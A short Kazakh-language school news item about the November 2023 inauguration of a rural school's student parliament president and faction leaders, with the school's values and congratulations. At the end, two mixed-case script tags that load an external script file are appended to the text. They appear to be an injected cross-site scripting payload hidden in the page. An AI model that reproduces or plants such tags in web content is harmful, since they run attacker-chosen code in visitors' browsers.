АҚМОЛА ОБЛЫСЫ "Алтынды ауылының жалпы орта білім беретін мектебі" КММ 2023 жылы 07 қараша күні мектеп Парламенті Президентін және "Өзін - өзі басқару" ұйымының мүшелерін ұлықтау рәсімі (инаугурация) өткізілді. Тәрбие құндылықтары: ҰЛТТЫҚ МҮДДЕ: Ұлттық мәдениетті дәріптеу, қоғам игілігі үшін қызмет ету, Қазақстан мүддесіне қызмет етуге ұмтылу. АР-ҰЯТ: Әдеп нормаларын ұстану, адал еңбекті құрметтеу, сөзіне берік, ісіне адал болу, халқына адал қызмет ету. ТАЛАП: Білуге, жаңаны тануға құштар болу, дұрыс қарым-қатынас ората білу . Мектеп Президенті лауазымына 10 "А" сынып оқушысы Сулейменова Диана сайланды. Мектеп көшбасшылары: 1.Құқық және тәртіп фракциясының көшбасшысы- Сапарханқызы Айжұлдыз 2.Ақпарат фракциясының көшбасшысы-Влох Ванесса. 3.Спорт және салауатты өмір салты фракциясының көшбасшысы-Мусаев Никита. 4.Өзін-өзі тану және бақыт фракциясының көшбасшысы- Көкейқызы Сымбат 5.Қамқорлық фракциясының көшбасшысы- Албакова Лиза. 6.Мәдениет және өнер фракциясының көшбасшысы- Суйениш Аружан. 7.Дебат қозғалысының көшбасшысы-Албакова Тамара. 8.Экология және еңбек фракциясының көшбасшысы- Жупарханқызы Назар. Мектеп Президентін және "Өзін - өзі басқару" ұйымының барлық мүшелерін берілген лауазымдарымен шын жүректен құттықтай және мектеп қабырғасындағы жұмыстарына сәттілік тілейміз.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>